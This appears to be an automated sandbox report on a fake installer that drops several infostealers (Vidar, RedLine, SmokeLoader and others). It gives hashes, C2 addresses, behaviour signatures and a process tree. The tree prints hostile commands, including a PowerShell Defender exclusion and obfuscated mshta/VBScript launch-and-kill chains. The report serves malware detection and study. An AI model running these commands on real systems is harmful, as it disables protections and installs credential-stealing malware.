Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
08-10-2021 15:07
211008-shl8xsefa9 1008-10-2021 05:38
211008-gbvqyadce8 1007-10-2021 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
19s -
max time network
188s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
07-10-2021 18:28
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Malware Config
Extracted
vidar
41.2
916
https://mas.to/@serg4325
-
profile_id
916
Extracted
redline
media214
91.121.67.60:2151
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
vidar
41.2
937
https://mas.to/@serg4325
-
profile_id
937
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4060 3380 rundll32.exe 23 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral5/memory/2136-251-0x000000000041B23A-mapping.dmp family_redline behavioral5/memory/2136-250-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral5/memory/4656-505-0x0000000005320000-0x0000000005926000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral5/files/0x000100000001ab2c-155.dat family_socelars behavioral5/files/0x000100000001ab2c-188.dat family_socelars -
Arkei Stealer Payload 1 IoCs
resource yara_rule behavioral5/memory/3544-493-0x0000000000400000-0x0000000004A15000-memory.dmp family_arkei -
Vidar Stealer 4 IoCs
resource yara_rule behavioral5/memory/2696-220-0x0000000004B20000-0x0000000004BF6000-memory.dmp family_vidar behavioral5/memory/2696-223-0x0000000000400000-0x0000000002E08000-memory.dmp family_vidar behavioral5/memory/4424-478-0x0000000000C40000-0x0000000000D16000-memory.dmp family_vidar behavioral5/memory/4424-485-0x0000000000400000-0x00000000008D5000-memory.dmp family_vidar -
resource yara_rule behavioral5/files/0x000100000001ab21-121.dat aspack_v212_v242 behavioral5/files/0x000100000001ab21-123.dat aspack_v212_v242 behavioral5/files/0x000200000001ab20-122.dat aspack_v212_v242 behavioral5/files/0x000200000001ab20-128.dat aspack_v212_v242 behavioral5/files/0x000200000001ab20-127.dat aspack_v212_v242 behavioral5/files/0x000100000001ab23-126.dat aspack_v212_v242 behavioral5/files/0x000100000001ab23-129.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 18 IoCs
pid Process 3224 setup_installer.exe 592 setup_install.exe 3284 Thu166f9a8bbe80.exe 3256 Thu167d514d2a7ac5a.exe 3472 Thu16205451b994.exe 2372 Thu164ba03be19.exe 3648 Thu16f584bd3686.exe 4080 Thu16f3de88a335950bb.exe 1444 Thu1653d94a8da.exe 2148 Thu165bd34b1e1d4d81.exe 1860 Thu161580bf75.exe 2696 Thu1628aafb3efd7c3d.exe 2244 Thu16466b26f8b7.exe 1568 Thu16f3de88a335950bb.tmp 1640 Thu16f3de88a335950bb.exe 3812 vAefTJ46fdmqTOTJP6ypfG2A.exe 2988 1712628.scr 1144 3134954.scr -
Loads dropped DLL 10 IoCs
pid Process 592 setup_install.exe 592 setup_install.exe 592 setup_install.exe 592 setup_install.exe 592 setup_install.exe 592 setup_install.exe 592 setup_install.exe 592 setup_install.exe 1568 Thu16f3de88a335950bb.tmp 3812 vAefTJ46fdmqTOTJP6ypfG2A.exe -
resource yara_rule behavioral5/files/0x00040000000155ab-258.dat themida behavioral5/files/0x000200000001561a-269.dat themida behavioral5/memory/1384-284-0x0000000000800000-0x0000000000801000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ip-api.com 50 ipinfo.io 51 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 9 IoCs
pid pid_target Process procid_target 4532 3472 WerFault.exe 91 4300 3472 WerFault.exe 91 5228 4432 WerFault.exe 143 5560 3472 WerFault.exe 91 5028 3472 WerFault.exe 91 5956 3472 WerFault.exe 91 5952 3472 WerFault.exe 91 4328 5312 WerFault.exe 155 5956 3472 WerFault.exe 91 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu16466b26f8b7.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu16466b26f8b7.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu16466b26f8b7.exe -
Kills process with taskkill 3 IoCs
pid Process 3156 taskkill.exe 3500 taskkill.exe 1112 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 30 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2244 Thu16466b26f8b7.exe 2244 Thu16466b26f8b7.exe 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeCreateTokenPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeAssignPrimaryTokenPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeLockMemoryPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeIncreaseQuotaPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeMachineAccountPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeTcbPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeSecurityPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeTakeOwnershipPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeLoadDriverPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeSystemProfilePrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeSystemtimePrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeProfSingleProcessPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeIncBasePriorityPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeCreatePagefilePrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeCreatePermanentPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeBackupPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeRestorePrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeShutdownPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeAuditPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeSystemEnvironmentPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeChangeNotifyPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeRemoteShutdownPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeUndockPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeSyncAgentPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeEnableDelegationPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeManageVolumePrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeImpersonatePrivilege 2148 Thu165bd34b1e1d4d81.exe Token: SeCreateGlobalPrivilege 2148 Thu165bd34b1e1d4d81.exe Token: 31 2148 Thu165bd34b1e1d4d81.exe Token: 32 2148 Thu165bd34b1e1d4d81.exe Token: 33 2148 Thu165bd34b1e1d4d81.exe Token: 34 2148 Thu165bd34b1e1d4d81.exe Token: 35 2148 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 1860 Thu161580bf75.exe Token: SeDebugPrivilege 2668 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3932 wrote to memory of 3224 3932 setup_x86_x64_install.exe 73 PID 3932 wrote to memory of 3224 3932 setup_x86_x64_install.exe 73 PID 3932 wrote to memory of 3224 3932 setup_x86_x64_install.exe 73 PID 3224 wrote to memory of 592 3224 setup_installer.exe 74 PID 3224 wrote to memory of 592 3224 setup_installer.exe 74 PID 3224 wrote to memory of 592 3224 setup_installer.exe 74 PID 592 wrote to memory of 4092 592 setup_install.exe 77 PID 592 wrote to memory of 4092 592 setup_install.exe 77 PID 592 wrote to memory of 4092 592 setup_install.exe 77 PID 592 wrote to memory of 1356 592 setup_install.exe 78 PID 592 wrote to memory of 1356 592 setup_install.exe 78 PID 592 wrote to memory of 1356 592 setup_install.exe 78 PID 592 wrote to memory of 1760 592 setup_install.exe 79 PID 592 wrote to memory of 1760 592 setup_install.exe 79 PID 592 wrote to memory of 1760 592 setup_install.exe 79 PID 592 wrote to memory of 1608 592 setup_install.exe 80 PID 592 wrote to memory of 1608 592 setup_install.exe 80 PID 592 wrote to memory of 1608 592 setup_install.exe 80 PID 592 wrote to memory of 1716 592 setup_install.exe 81 PID 592 wrote to memory of 1716 592 setup_install.exe 81 PID 592 wrote to memory of 1716 592 setup_install.exe 81 PID 592 wrote to memory of 1692 592 setup_install.exe 82 PID 592 wrote to memory of 1692 592 setup_install.exe 82 PID 592 wrote to memory of 1692 592 setup_install.exe 82 PID 592 wrote to memory of 2968 592 setup_install.exe 89 PID 592 wrote to memory of 2968 592 setup_install.exe 89 PID 592 wrote to memory of 2968 592 setup_install.exe 89 PID 592 wrote to memory of 1044 592 setup_install.exe 83 PID 592 wrote to memory of 1044 592 setup_install.exe 83 PID 592 wrote to memory of 1044 592 setup_install.exe 83 PID 592 wrote to memory of 3144 592 setup_install.exe 88 PID 592 wrote to memory of 3144 592 setup_install.exe 88 PID 592 wrote to memory of 3144 592 setup_install.exe 88 PID 592 wrote to memory of 2220 592 setup_install.exe 84 PID 592 wrote to memory of 2220 592 setup_install.exe 84 PID 592 wrote to memory of 2220 592 setup_install.exe 84 PID 592 wrote to memory of 2684 592 setup_install.exe 87 PID 592 wrote to memory of 2684 592 setup_install.exe 87 PID 592 wrote to memory of 2684 592 setup_install.exe 87 PID 4092 wrote to memory of 2668 4092 cmd.exe 85 PID 4092 wrote to memory of 2668 4092 cmd.exe 85 PID 4092 wrote to memory of 2668 4092 cmd.exe 85 PID 592 wrote to memory of 2880 592 setup_install.exe 86 PID 592 wrote to memory of 2880 592 setup_install.exe 86 PID 592 wrote to memory of 2880 592 setup_install.exe 86 PID 1356 wrote to memory of 3284 1356 cmd.exe 93 PID 1356 wrote to memory of 3284 1356 cmd.exe 93 PID 1356 wrote to memory of 3284 1356 cmd.exe 93 PID 1760 wrote to memory of 3472 1760 cmd.exe 91 PID 1760 wrote to memory of 3472 1760 cmd.exe 91 PID 1760 wrote to memory of 3472 1760 cmd.exe 91 PID 2880 wrote to memory of 3256 2880 cmd.exe 90 PID 2880 wrote to memory of 3256 2880 cmd.exe 90 PID 2880 wrote to memory of 3256 2880 cmd.exe 90 PID 2220 wrote to memory of 2372 2220 cmd.exe 92 PID 2220 wrote to memory of 2372 2220 cmd.exe 92 PID 2220 wrote to memory of 2372 2220 cmd.exe 92 PID 1044 wrote to memory of 3648 1044 cmd.exe 99 PID 1044 wrote to memory of 3648 1044 cmd.exe 99 PID 3144 wrote to memory of 4080 3144 cmd.exe 97 PID 3144 wrote to memory of 4080 3144 cmd.exe 97 PID 3144 wrote to memory of 4080 3144 cmd.exe 97 PID 2684 wrote to memory of 1444 2684 cmd.exe 96 PID 2684 wrote to memory of 1444 2684 cmd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
PID:3284 -
C:\Users\Admin\Pictures\Adobe Films\RtDDcYp4HUy29J4XBGOC2cDx.exe"C:\Users\Admin\Pictures\Adobe Films\RtDDcYp4HUy29J4XBGOC2cDx.exe"6⤵PID:4180
-
-
C:\Users\Admin\Pictures\Adobe Films\scg9XRbbxslSBxWivpD2CVwX.exe"C:\Users\Admin\Pictures\Adobe Films\scg9XRbbxslSBxWivpD2CVwX.exe"6⤵PID:3104
-
-
C:\Users\Admin\Pictures\Adobe Films\KZcyMBlb6BCOCSOs52n9033a.exe"C:\Users\Admin\Pictures\Adobe Films\KZcyMBlb6BCOCSOs52n9033a.exe"6⤵PID:4424
-
-
C:\Users\Admin\Pictures\Adobe Films\RWpiD8u02tNNJ1s6Q8t78eX6.exe"C:\Users\Admin\Pictures\Adobe Films\RWpiD8u02tNNJ1s6Q8t78eX6.exe"6⤵PID:4884
-
-
C:\Users\Admin\Pictures\Adobe Films\gMZK79gzKU9kckjujo9sSais.exe"C:\Users\Admin\Pictures\Adobe Films\gMZK79gzKU9kckjujo9sSais.exe"6⤵PID:4840
-
-
C:\Users\Admin\Pictures\Adobe Films\QDd0Z3E3gb8w65JbkhguPrOH.exe"C:\Users\Admin\Pictures\Adobe Films\QDd0Z3E3gb8w65JbkhguPrOH.exe"6⤵PID:4788
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵PID:4336
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵PID:4884
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tTYHCsWWPkiHzTzo_a3aNJqN.exe"C:\Users\Admin\Pictures\Adobe Films\tTYHCsWWPkiHzTzo_a3aNJqN.exe"6⤵PID:4756
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:5540
-
-
-
C:\Users\Admin\Pictures\Adobe Films\j_UOpsGUBkqGh45MTTg4OQ7J.exe"C:\Users\Admin\Pictures\Adobe Films\j_UOpsGUBkqGh45MTTg4OQ7J.exe"6⤵PID:3544
-
-
C:\Users\Admin\Pictures\Adobe Films\kiPCFbq753OZOsbbjt7N1tAO.exe"C:\Users\Admin\Pictures\Adobe Films\kiPCFbq753OZOsbbjt7N1tAO.exe"6⤵PID:4724
-
-
C:\Users\Admin\Pictures\Adobe Films\J7u6d5DiVXpH9qrMAnyIhX1W.exe"C:\Users\Admin\Pictures\Adobe Films\J7u6d5DiVXpH9qrMAnyIhX1W.exe"6⤵PID:4700
-
-
C:\Users\Admin\Pictures\Adobe Films\meUrYdlFz1DmLfkwzj9zYMwB.exe"C:\Users\Admin\Pictures\Adobe Films\meUrYdlFz1DmLfkwzj9zYMwB.exe"6⤵PID:4656
-
-
C:\Users\Admin\Pictures\Adobe Films\nvObiXXaSbSEZZAhizlNQQ20.exe"C:\Users\Admin\Pictures\Adobe Films\nvObiXXaSbSEZZAhizlNQQ20.exe"6⤵PID:4608
-
-
C:\Users\Admin\Pictures\Adobe Films\4e83rthySMcEQziISH4ZdBcG.exe"C:\Users\Admin\Pictures\Adobe Films\4e83rthySMcEQziISH4ZdBcG.exe"6⤵PID:4432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 2487⤵
- Program crash
PID:5228
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7U33bmk6SBc_RFHBuMOjJY4V.exe"C:\Users\Admin\Pictures\Adobe Films\7U33bmk6SBc_RFHBuMOjJY4V.exe"6⤵PID:1548
-
-
C:\Users\Admin\Pictures\Adobe Films\3AF_A3Jxn90IHfnxFILv6oxE.exe"C:\Users\Admin\Pictures\Adobe Films\3AF_A3Jxn90IHfnxFILv6oxE.exe"6⤵PID:4280
-
-
C:\Users\Admin\Pictures\Adobe Films\gFO_UKZpPoL02bBNOpvPJmQD.exe"C:\Users\Admin\Pictures\Adobe Films\gFO_UKZpPoL02bBNOpvPJmQD.exe"6⤵PID:4580
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE (CrEATEoBjeCT ( "wsCrIpt.shELl" ).RUn( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\gFO_UKZpPoL02bBNOpvPJmQD.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\gFO_UKZpPoL02bBNOpvPJmQD.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))7⤵PID:6044
-
-
-
C:\Users\Admin\Pictures\Adobe Films\k7ikkbC1J7fcLcU_OdbsS21B.exe"C:\Users\Admin\Pictures\Adobe Films\k7ikkbC1J7fcLcU_OdbsS21B.exe"6⤵PID:4568
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:5672
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nLSZ9CtkCMGmQTvMc6u4_24z.exe"C:\Users\Admin\Pictures\Adobe Films\nLSZ9CtkCMGmQTvMc6u4_24z.exe"6⤵PID:4540
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:5280
-
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵PID:5456
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵PID:5576
-
-
-
C:\Users\Admin\Pictures\Adobe Films\vAefTJ46fdmqTOTJP6ypfG2A.exe"C:\Users\Admin\Pictures\Adobe Films\vAefTJ46fdmqTOTJP6ypfG2A.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3812 -
C:\Users\Admin\Pictures\Adobe Films\vAefTJ46fdmqTOTJP6ypfG2A.exe"C:\Users\Admin\Pictures\Adobe Films\vAefTJ46fdmqTOTJP6ypfG2A.exe"7⤵PID:5920
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9hNqjoweCnXUvBKYTvsapR_4.exe"C:\Users\Admin\Pictures\Adobe Films\9hNqjoweCnXUvBKYTvsapR_4.exe"6⤵PID:5112
-
-
C:\Users\Admin\Pictures\Adobe Films\AL45VBc_UErCDcIiL5rnN8nd.exe"C:\Users\Admin\Pictures\Adobe Films\AL45VBc_UErCDcIiL5rnN8nd.exe"6⤵PID:2232
-
-
C:\Users\Admin\Pictures\Adobe Films\xOSXLcKOJRyr6XvQw14CHB6c.exe"C:\Users\Admin\Pictures\Adobe Films\xOSXLcKOJRyr6XvQw14CHB6c.exe"6⤵PID:4912
-
-
C:\Users\Admin\Pictures\Adobe Films\6_4FcvpiSkRJOjUE9VlFRL1I.exe"C:\Users\Admin\Pictures\Adobe Films\6_4FcvpiSkRJOjUE9VlFRL1I.exe"6⤵PID:4900
-
C:\Users\Admin\Pictures\Adobe Films\6_4FcvpiSkRJOjUE9VlFRL1I.exe"C:\Users\Admin\Pictures\Adobe Films\6_4FcvpiSkRJOjUE9VlFRL1I.exe"7⤵PID:6060
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
PID:3472 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 6566⤵
- Program crash
PID:4532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 6726⤵
- Program crash
PID:4300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 7046⤵
- Program crash
PID:5560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 7246⤵
- Program crash
PID:5028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 8966⤵
- Program crash
PID:5956
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 9646⤵
- Program crash
PID:5952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 11686⤵
- Program crash
PID:5956
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1860 -
C:\Users\Admin\AppData\Roaming\1712628.scr"C:\Users\Admin\AppData\Roaming\1712628.scr" /S6⤵
- Executes dropped EXE
PID:2988
-
-
C:\Users\Admin\AppData\Roaming\3134954.scr"C:\Users\Admin\AppData\Roaming\3134954.scr" /S6⤵
- Executes dropped EXE
PID:1144 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:1172
-
-
-
C:\Users\Admin\AppData\Roaming\8683850.scr"C:\Users\Admin\AppData\Roaming\8683850.scr" /S6⤵PID:1384
-
-
C:\Users\Admin\AppData\Roaming\6511678.scr"C:\Users\Admin\AppData\Roaming\6511678.scr" /S6⤵PID:784
-
-
C:\Users\Admin\AppData\Roaming\8466076.scr"C:\Users\Admin\AppData\Roaming\8466076.scr" /S6⤵PID:4396
-
-
C:\Users\Admin\AppData\Roaming\5900983.scr"C:\Users\Admin\AppData\Roaming\5900983.scr" /S6⤵PID:4308
-
C:\Users\Admin\AppData\Roaming\5900983.scr"C:\Users\Admin\AppData\Roaming\5900983.scr"7⤵PID:5240
-
-
C:\Users\Admin\AppData\Roaming\5900983.scr"C:\Users\Admin\AppData\Roaming\5900983.scr"7⤵PID:5312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5312 -s 8168⤵
- Program crash
PID:4328
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
PID:2696 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu1628aafb3efd7c3d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu1628aafb3efd7c3d.exe" & del C:\ProgramData\*.dll & exit6⤵PID:4316
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu1628aafb3efd7c3d.exe /f7⤵
- Kills process with taskkill
PID:3500
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2148 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4924
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:1112
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu16f584bd3686.exeThu16f584bd3686.exe5⤵
- Executes dropped EXE
PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu164ba03be19.exe6⤵PID:2136
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
PID:3256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
PID:1444 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:3140
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"7⤵PID:4356
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:4940
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:5748
-
-
-
